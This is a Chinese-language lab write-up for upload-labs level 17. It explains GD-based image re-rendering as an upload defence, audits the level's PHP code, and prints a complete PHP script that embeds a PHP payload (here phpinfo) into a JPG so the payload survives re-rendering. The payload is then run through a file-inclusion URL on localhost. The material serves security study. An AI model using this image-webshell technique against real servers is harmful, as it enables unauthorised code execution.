目录
本文通过《upload-labs通关笔记-第17关二次渲染之jpg格式图片》系列,制作jpg图片马来绕过二次渲染进行渗透实战。二次渲染可以使用服务器端图像处理库重新生成新的图片文件,能消除文件中可能隐藏的恶意代码,可以防范文件上传安全风险。
一、二次渲染
文件上传的二次渲染是一种高级的文件上传风险防御技术,其核心原理是通过服务器端图像处理库(如GD库)对用户上传的图片文件进行重新解析和生成,彻底消除原始文件中可能隐藏的恶意代码。这种技术相比简单的文件头校验或重命名更为安全,因为它从根本上重构了文件内容,从而有效防范了图片马、webshell等常见文件上传攻击手段。
二次渲染是一种有效的防御技术,其核心思想是。
接收上传的文件
使用服务器端图像处理库重新生成文件
只保存新生成的文件,丢弃原始上传文件
二次渲染的安全性优势如下所示。
消除恶意代码:
图像处理库会丢弃所有非图像数据
无法保留隐藏在文件中的PHP代码或其他恶意内容
破坏特殊构造:
攻击者精心构造的畸形文件会被标准化
利用图像解析器进行文件上传绕过的可能性大大降低
二、代码审计
进入upload-labs靶场的第17关二次渲染关卡,查看源码分析其功能。这段代码实现了一个图片上传并通过imagecreatefromjpeg/png/gif等函数进行二次渲染的功能。它会检查上传文件的扩展名和 MIME 类型,只允许上传 JPEG、PNG 和 GIF 格式的图片。对于符合要求的图片,会将其移动到指定的目标路径,然后使用 PHP 的 GD 库对图片进行二次渲染,这个过程中所有非图像数据(如可能隐藏在文件中的PHP代码、恶意脚本等)都会被自动丢弃生成新的图片文件,、最后系统只保存服务器重新生成的"干净"图片文件并删除用户原始上传文件。在整个过程中,会根据不同的情况给出相应的提示信息。本关卡只针对jpg类型的图片进行二次渲染绕过,故而对jpg格式的源码进行详细注释,具体如下所示。
// 判断文件后缀是否为jpg且MIME类型为image/jpeg(双重验证)
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
// 将上传的临时文件移动到目标路径(安全函数,会验证是否为合法上传文件)
if(move_uploaded_file($tmpname, $target_path)){
/**
* 关键安全步骤:二次渲染
* 使用GD库从上传的JPG文件创建图像资源
* 如果文件不是真正的JPG图片,这里会返回false
*/
$im = imagecreatefromjpeg($target_path);
// 检查图像资源创建是否失败
if($im == false){
$msg = "该文件不是jpg格式的图片!"; // 设置错误消息
@unlink($target_path); // 静默删除无效文件(@抑制错误输出)
} else {
/**
* 安全命名策略:
* 1. 使用时间作为随机数种子
* 2. 生成随机数作为文件名
* 3. 强制添加.jpg扩展名
* 防止文件名预测和冲突
*/
srand(time()); // 初始化随机数生成器
$newfilename = strval(rand()).".jpg"; // 生成随机文件名
// 构建新文件的完整存储路径
$img_path = UPLOAD_PATH.'/'.$newfilename;
/**
* 关键安全步骤:重新生成图像
* 将图像资源保存为新的JPG文件
* 这个过程会丢弃所有非图像数据,消除潜在恶意代码
*/
imagejpeg($im, $img_path);
// 安全清理:删除原始上传文件(只保留二次渲染后的文件)
@unlink($target_path);
// 标记上传成功状态
$is_upload = true;
}
} else {
// 文件移动失败时的错误处理
$msg = "上传出错!";
}
}通过代码审计可知本关卡采用文件后缀、MIME法且通过imagecreatefromjpeg函数进行二次渲染处理,具体分析如下。
(1)双重验证
- 检查文件扩展名(匹配.jpg)
- 验证MIME类型(匹配image/jpeg)
(2)二次渲染
- 使用imagecreatefromjpeg()和imagejpeg()对图像进行二次处理
- 这种方法能有效消除jpg文件中可能隐藏的恶意代码
- 生成全新的图像文件,不保留原始文件的元数据
(3)随机文件名
- 使用time()和rand()生成不易被猜测的随机文件名
- 防止文件名冲突和预测攻击
三、脚本法渗透
1、构造PHP脚本
使用如下Sergey Bobrov的代码,通过miniPayload参数向图像文件中注入PHP代码,尝试保证注入的数据在经过 PHP 的imagecopyresized() 和 imagecopyresampled()函数处理后仍然保持不变。本关卡构造的php脚本如下所示。
<? phpinfo();?>接下来对miniPayload 赋值,具体如下所示。
$miniPayload = "<? phpinfo();?>"将如下脚本命名为jpg_info.php,具体效果如下所示。代码的功能是向 JPG 图像中植入 PHP 代码(如<? phpinfo();?>),使得图像文件在表面上仍为正常的 JPG 格式,且经过 PHP 的 GD 库图像处理函数处理后,注入的代码依然有效。这是一种典型的 "图像马" 生成技术。
<?php
/*
此代码实现了将有效负载注入 JPG 图像的算法,注入的数据在经过 PHP 函数 imagecopyresized() 和 imagecopyresampled() 处理后保持不变。
前提条件是初始图像和处理后图像的大小和质量相同。
操作步骤:
1) 通过安全的文件上传脚本上传任意图像。
2) 保存处理后的图像并运行:
jpg_payload.php <jpg_name.jpg>
相关参考:
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
*/
// 定义要注入的最小有效负载,这里是一个简单的 PHP 代码,用于输出 PHP 信息
$miniPayload = "<? phpinfo();?>";
if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
die('php-gd is not installed');
}
if(!isset($argv[1])) {
die('php jpg_payload.php <jpg_name.jpg>');
}
set_error_handler("custom_error_handler");
for($pad = 0; $pad < 1024; $pad++) {
$nullbytePayloadSize = $pad;
$dis = new DataInputStream($argv[1]);
$outStream = file_get_contents($argv[1]);
$extraBytes = 0;
$correctImage = TRUE;
if($dis->readShort() != 0xFFD8) {
die('Incorrect SOI marker');
}
while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
$marker = $dis->readByte();
$size = $dis->readShort() - 2;
$dis->skip($size);
if($marker === 0xDA) {
$startPos = $dis->seek();
$outStreamTmp =
substr($outStream, 0, $startPos) .
$miniPayload .
str_repeat("\0",$nullbytePayloadSize) .
substr($outStream, $startPos);
checkImage('_'.$argv[1], $outStreamTmp, TRUE);
if($extraBytes !== 0) {
while((!$dis->eof())) {
if($dis->readByte() === 0xFF) {
if($dis->readByte !== 0x00) {
break;
}
}
}
$stopPos = $dis->seek() - 2;
$imageStreamSize = $stopPos - $startPos;
$outStream =
substr($outStream, 0, $startPos) .
$miniPayload .
substr(
str_repeat("\0",$nullbytePayloadSize).
substr($outStream, $startPos, $imageStreamSize),
0,
$nullbytePayloadSize+$imageStreamSize-$extraBytes) .
substr($outStream, $stopPos);
} elseif($correctImage) {
$outStream = $outStreamTmp;
} else {
break;
}
if(checkImage('payload_'.$argv[1], $outStream)) {
die('Success!');
} else {
break;
}
}
}
}
unlink('payload_'.$argv[1]);
die('Something\'s wrong');
function checkImage($filename, $data, $unlink = FALSE) {
global $correctImage;
file_put_contents($filename, $data);
$correctImage = TRUE;
imagecreatefromjpeg($filename);
if($unlink)
unlink($filename);
return $correctImage;
}
function custom_error_handler($errno, $errstr, $errfile, $errline) {
global $extraBytes, $correctImage;
$correctImage = FALSE;
if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
if(isset($m[1])) {
$extraBytes = (int)$m[1];
}
}
}
class DataInputStream {
private $binData;
private $order;
private $size;
public function __construct($filename, $order = false, $fromString = false) {
$this->binData = '';
$this->order = $order;
if(!$fromString) {
if(!file_exists($filename) || !is_file($filename))
die('File not exists ['.$filename.']');
$this->binData = file_get_contents($filename);
} else {
$this->binData = $filename;
}
$this->size = strlen($this->binData);
}
public function seek() {
return ($this->size - strlen($this->binData));
}
public function skip($skip) {
$this->binData = substr($this->binData, $skip);
}
public function readByte() {
if($this->eof()) {
die('End Of File');
}
$byte = substr($this->binData, 0, 1);
$this->binData = substr($this->binData, 1);
return ord($byte);
}
public function readShort() {
if(strlen($this->binData) < 2) {
die('End Of File');
}
$short = substr($this->binData, 0, 2);
$this->binData = substr($this->binData, 2);
if($this->order) {
$short = (ord($short[1]) << 8) + ord($short[0]);
} else {
$short = (ord($short[0]) << 8) + ord($short[1]);
}
return $short;
}
public function eof() {
return !$this->binData||(strlen($this->binData) === 0);
}
}
?>
2、执行PHP脚本
准备好脚本jpg_info.php,图片ljn.jpg,如下所示。
以我的电脑使用小皮phpstudy为例,php为小皮集成,这里选择php5.5的版本,PHP安装位置为
C:\phpstudy_pro\Extensions\php\php5.5.9nts,在命令行进入到当前目录,执行如下命令生成图片马payload_ljn.jpg。
C:\phpstudy_pro\Extensions\php\php5.5.9nts\php.exe jpg_info.php ljn.jpg
3、上传图片马
上传图片马payload_ljn.jpg并获取图片的地址,如下所示。
4、获取图片马地址
图片的url地址如下所示,这个图片是二次渲染后。
http://127.0.0.1/upload-labs/upload/12293.jpg下载该图片,使用16进制编辑器查看图片内容,对比渲染前后的图片,发现二次渲染后的图片依旧包含代码,并未被渲染掉。
5、利用文件包含访问图片马
构造通过文件包含访问恶意URL,具体如下所示。
http://127.0.0.1/upload-labs/include.php?file=upload/12293.jpg访问脚本,鼠标滚轮向下滑获取到php版本信息,具体如下所示。
6、特别技巧提示成功概率
这个生成图片马的脚本经常失败, 原作者提到过由于使用了最直接的注入方法,可能出现“第二次处理后,注入的数据可能会部分损坏”的问题,如果出现这些问题,尝试更改有效负载(例如在开头添加一些符号)或尝试使用其他初始图像。
我在复现问题时,出现过失败,我的解决方法是对mini_payload的尾部增加一些空格,比如原本获取php信息的脚本如下所示。
<? phpinfo();?>我会在脚本的尾部增加几个空格,提高生成图片马二次渲染后仍保留脚本的成功率,如下所示。
$miniPayload = "<? phpinfo();?> "经过修改后,制作的图片马成功概率大大提升。 同时,原始图片不要过于复杂,可以使用python生成,具体脚本如下所示。
from PIL import Image, ImageDraw, ImageFont
def add_text_to_image(text):
# 创建一个 256x256 的白色背景图像
img = Image.new('RGB', (256, 256), (255, 255, 255))
# 创建一个绘图对象
draw = ImageDraw.Draw(img)
try:
# 尝试使用系统默认字体,这里使用 Arial 字体,字号为 36
font = ImageFont.truetype("arial.ttf", 36)
except OSError:
# 如果 Arial 字体不可用,使用系统默认字体
font = ImageFont.load_default()
# 使用 textbbox 方法获取文本的边界框
left, top, right, bottom = draw.textbbox((0, 0), text, font=font)
# 计算文本的宽度和高度
text_width = right - left
text_height = bottom - top
# 计算文本居中的 x 坐标
x = (img.width - text_width) // 2
# 计算文本居中的 y 坐标
y = (img.height - text_height) // 2
# 在图像上绘制文本,文本颜色为紫色
draw.text((x, y), text, fill=(255, 0, 255), font=font)
# 显示图像
img.show()
# 保存图像为 ljn.jpg
img.save('ljn.jpg')
# 调用函数并传入要添加的文本
text = "mooyuan!" # 要写入的文字
add_text_to_image(text)